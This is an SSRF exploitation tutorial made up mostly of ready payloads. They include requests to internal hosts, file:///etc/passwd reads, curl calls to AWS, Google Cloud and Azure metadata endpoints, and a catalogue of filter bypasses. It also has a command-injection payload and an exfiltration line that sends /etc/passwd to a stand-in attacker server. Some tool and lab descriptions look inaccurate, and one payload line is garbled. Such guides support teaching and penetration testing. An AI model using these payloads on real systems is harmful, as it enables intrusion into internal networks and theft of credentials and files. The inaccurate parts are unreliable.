Comprehensive Guide to Finding and Exploiting SSRF Vulnerabilities

Server-Side Request Forgery (SSRF) is a critical web security vulnerability that allows attackers to make unauthorized requests from the server, leading to potential data leakage or unauthorized access to internal systems. This guide provides an in-depth look at identifying, bypassing, and exploiting SSRF vulnerabilities with practical examples and techniques.

Identifying SSRF Vulnerabilities

Common Entry Points

To begin, identify functionalities where user input is used to make network requests. Here are several common places to look:

1. URL Fields in Forms: Forms that accept URLs for data fetching or resource loading.
2. Image Upload/Fetch Functions: Functions that fetch images from URLs provided by the user.
3. Import/Export Features: Features that import data from external URLs.
4. Third-Party API Integrations: Functions that use user-provided URLs to interact with third-party services.

A More comprehensive list

1. URL Parameters: Places where the application takes a URL as an input parameter can be vulnerable. For example, an image fetcher or a URL preview feature might allow users to specify a URL to fetch data from.
2. File Uploads: If the application allows file uploads, check if the file uploader fetches files from a URL or if there is an image/video processing feature that accesses URLs provided by the user.
3. HTTP Requests: Functions that make HTTP requests based on user input, such as fetching metadata from a provided URL or a web scraping feature, can be susceptible.
4. Redirects: URL redirection mechanisms that accept user input to redirect users to other locations might be used to trigger SSRF.
5. Webhooks and Callbacks: Features that include webhooks or callback URLs provided by the user can be exploited to perform SSRF if not properly validated.
6. SSRF in JSON/XML Input: Applications accepting JSON/XML input where URLs can be included, such as in API endpoints, can be entry points for SSRF.
7. OAuth/OpenID Connect: Implementations of OAuth or OpenID Connect where URLs are used for redirecting tokens or user information can also be checked for SSRF.
8. Backend Systems: Features that interact with internal services, such as internal API calls, intranet services, or cloud metadata services, might be used to exploit SSRF.
9. Network Services Interaction: Any feature that interacts with network services, such as DNS lookups or email services, can be potential SSRF vectors if URLs are involved.

Practical Examples

1. Webhooks: APIs often use webhooks to receive real-time data from other services. If the webhook URL is user-controllable and lacks validation, it can be manipulated to cause the server to interact with unauthorized internal services.
2. File Downloads and Uploads: Features allowing users to download files from a URL or upload files to a server can be exploited if the URL is not properly validated or restricted.
3. Integration Points: APIs designed to fetch data from user-specified URLs are particularly at risk if those URLs are not rigorously validated and sanitized.

Inspecting Requests

Using tools like Burp Suite, capture and inspect HTTP requests to find user inputs that directly influence the request URL. For example:

POST /api/fetchData HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/json

{
    "url": "http://example.com/resource"
}

Manipulating Input

Modify the input URL to point to an internal address or a different external service, such as:

{
  "url": "http://127.0.0.1:80"
}

here are the examples of manipulating inputs to find SSRF:

GET /fetch?url=http://localhost/admin HTTP/1.1
Host: vulnerable.com

{
  "imageUrl": "http://127.0.0.1/admin"
}

<form action="/submit" method="post">
  <input
    type="text"
    name="webhook"
    value="http://localhost:8080/internal-api"
  />
  <input type="submit" value="Submit" />
</form>

GET /resource HTTP/1.1
Host: vulnerable.com
Referer: http://localhost/internal

<request>
  <imageUrl>http://localhost/admin</imageUrl>
</request>

http://vulnerable.com/redirect?url=http://localhost/admin

Submit the modified request and observe the server's response. If it returns data from the internal service, it indicates an SSRF vulnerability.

Testing Different Protocols

SSRF is not limited to HTTP. Test various protocols to see if the server supports them:

• ftp://127.0.0.1
• file:///etc/passwd
• gopher://127.0.0.1

When testing for SSRF vulnerabilities, it's essential to check how the application handles different protocols. Here are some examples of manipulating inputs to test various protocols:

# HTTP
GET /fetch?url=http://localhost/admin HTTP/1.1
Host: vulnerable.com


# HTTPS
GET /fetch?url=https://localhost/admin HTTP/1.1
Host: vulnerable.com


# FTP
GET /fetch?url=ftp://localhost/file.txt HTTP/1.1
Host: vulnerable.com


# File Protocol
GET /fetch?url=file:///etc/passwd HTTP/1.1
Host: vulnerable.com


# SMB
GET /fetch?url=smb://localhost/sharedfolder HTTP/1.1
Host: vulnerable.com


# LDAP
GET /fetch?url=ldap://localhost:389/cn=admin,dc=example,dc=com HTTP/1.1
Host: vulnerable.com


# Gopher
GET /fetch?url=gopher://localhost:70/_gopher.txt HTTP/1.1
Host: vulnerable.com


# Mailto
GET /fetch?url=mailto:admin@localhost HTTP/1.1
Host: vulnerable.com


# Dict
GET /fetch?url=dict://localhost:2628/definition HTTP/1.1
Host: vulnerable.com


# TFTP
GET /fetch?url=tftp://localhost/file.txt HTTP/1.1
Host: vulnerable.com

// File Input with JSON
{
  "fileUrl": "file:///etc/passwd"
}


// LDAP Input with JSON
{
  "ldapUrl": "ldap://localhost:389/cn=admin,dc=example,dc=com"
}


// Gopher Input with JSON
{
  "gopherUrl": "gopher://localhost:70/_gopher.txt"
}

Testing various protocols can help uncover SSRF vulnerabilities that may not be evident with just HTTP/HTTPS.

Bypassing Input Validation

Applications may use filters to block dangerous inputs. Common bypass techniques include:

• URL Encoding: http%3A%2F%2F127.0.0.1
• Case Manipulation: hTtp://127.0.0.1
• Alternative IP Representations: Use variations like 127.1, 0177.0.0.1, or 2130706433.
• Open Redirection: Redirect URLs to bypass filters.

Some Examples of Bypassing Input Filters

# Basic URL Encoding
GET /fetch?url=http%3A%2F%2Flocalhost%2Fadmin HTTP/1.1
Host: vulnerable.com


# Double URL Encoding
GET /fetch?url=http%253A%252F%252Flocalhost%252Fadmin HTTP/1.1
Host: vulnerable.com


# Using DNS Resolution
GET /fetch?url=http://localhost.example.com/admin HTTP/1.1
Host: vulnerable.com


# Using IPv6 Shortcuts
GET /fetch?url=http://[::1]/admin HTTP/1.1
Host: vulnerable.com


# Obfuscating the URL
GET /fetch?url=http://127.0.0.1:80%2f%2fadmin HTTP/1.1
Host: vulnerable.com


# Alternate IP Formats
GET /fetch?url=http://2130706433/admin HTTP/1.1
Host: vulnerable.com


# Using Null Bytes
GET /fetch?url=http://localhost%00.example.com/admin HTTP/1.1
Host: vulnerable.com


# Combining Protocols
GET /fetch?url=http://example.com#@localhost/admin HTTP/1.1
Host: vulnerable.com


# Adding Redundant Data
GET /fetch?url=http://[email protected]/admin HTTP/1.1
Host: vulnerable.com


# Exploiting Non-standard Ports
GET /fetch?url=http://localhost:8080/admin HTTP/1.1
Host: vulnerable.com


# Using Whitespaces
GET /fetch?url=http://127.0.0.1 /admin HTTP/1.1
Host: vulnerable.com


# Nested Requests
GET /fetch?url=http://example.com/?url=http://localhost/admin HTTP/1.1
Host: vulnerable.com


# Using CRLF Injection
GET /fetch?url=http://example.com%0d%0aGET%20/admin HTTP/1.1
Host: vulnerable.com


# Reserved Hostnames
GET /fetch?url=http://0/admin HTTP/1.1
Host: vulnerable.com


# Bypassing with Malformed IPs
GET /fetch?url=http://127.1 HTTP/1.1
Host: vulnerable.com

Bypassing SSRF Protections

1. Alternative IP Representations

   Use different notations to represent IP addresses:

   • Decimal: 2130706433 for 127.0.0.1
   • Octal: 0177.0.0.1 for 127.0.0.1

2. Obfuscation

   Obfuscate the URL to bypass simple string checks:

   • URL Encoding: http%3A%2F%2F127.0.0.1
   • Case Variation: hTtp://127.0.0.1
   • Double URL Encoding: http%253A%252F%252F127.0.0.1

3. DNS Rebinding

   Use DNS rebinding to convert an external domain to an internal IP address. Register a domain and configure it to resolve to 127.0.0.1 after an initial lookup.

4. Using Alternate Protocols

   Bypass filters by using lesser-known protocols:

   • gopher://127.0.0.1
   • dict://127.0.0.1

Advanced Techniques

1. Accessing Cloud Metadata Services

   Leverage SSRF to extract metadata from cloud services:

   AWS

   curl http://169.254.169.254/latest/meta-data/

   Google_Cloud

   curl http://metadata.google.internal/computeMetadata/v1/

   Azure

   curl http://169.254.169.254/metadata/instance?api-version=2019-08-15

   ---

2. Extracting Sensitive Files

   Read sensitive files using the file protocol:

   {
     "url": "file:///etc/passwd"
   }

   ---

3. Port Scanning

   Use SSRF to scan internal network ports:

   {
     "url": "http://192.168.1.1:80"
   }

   Observe the response to determine if the port is open.

   ---

4. Command Injection

   Leverage SSRF to execute commands on the server:

   {
     "url": "http://target.server/cgi-bin/admin.cgi?cmd=`whoami`"
   }

   ---

5. Data Exfiltration

   Exfiltrate data using SSRF by directing it to an external server under your control:

   {
     "url": "http://yourserver.com/collect?data=`cat /etc/passwd`"
   }

Practical Labs and Platforms

• TryHackMe SSRF: A room dedicated to understanding and exploiting Server-Side Request Forgery vulnerabilities with practical examples and scenarios.
• Hack The Box Traverxec: This machine includes an SSRF vulnerability that can be exploited as part of the challenge to gain initial foothold.
• PortSwigger Web Security Academy SSRF Labs: PortSwigger provides a series of labs on Server-Side Request Forgery, ranging from basic to advanced scenarios, with detailed explanations and solutions.

Real-World Examples

• Capital One Data Breach: The Capital One breach exploited an SSRF vulnerability in AWS metadata service, leading to the exposure of sensitive information.
• Google Cloud Platform SSRF: Researchers found an SSRF vulnerability in Google Cloud Platform's metadata service that could be exploited to access internal endpoints.
• Snapchat SSRF: Snapchat's API was found to be vulnerable to SSRF, allowing attackers to access internal systems.

Tools for SSRF Exploitation

• Burp Suite: Burp Suite is a comprehensive web security testing tool with features for intercepting, modifying, and automating SSRF attacks.
• SSRFmap: SSRFmap is a tool designed to automate SSRF vulnerability detection and exploitation using various payloads.
• URLCrazy: URLCrazy is a tool to generate and test domain typos and variations to help identify SSRF vulnerabilities.
• Gopherus: Gopherus helps in crafting gopher payloads for exploiting SSRF vulnerabilities.

In-depth Learning Resources

1. Books

   • Web Application Hacker's Handbook: Comprehensive guide on web application security, including SSRF vulnerabilities.
   • Real-World Bug Hunting: Practical guide with real-world examples of various web vulnerabilities including SSRF.

2. Blogs and Articles

   • PortSwigger Blog: Detailed articles on various web vulnerabilities including SSRF.
   • HackerOne Reports: Collection of bug bounty reports with SSRF vulnerabilities and their exploitation techniques.
   • Google Security Blog: Articles on security research and SSRF vulnerabilities found in various Google products.

3. Tutorials

   • Web Security Academy: Free online courses covering various web security topics including SSRF.

By leveraging these techniques and tools, you can identify and exploit SSRF vulnerabilities effectively.

Sources:

• PortSwigger Web Security Academy
• Snyk Learn
• HackTricks
• Detectify Labs
• Bright Security
• MasaudSec
• Aptori
• UncleSp1d3r Blog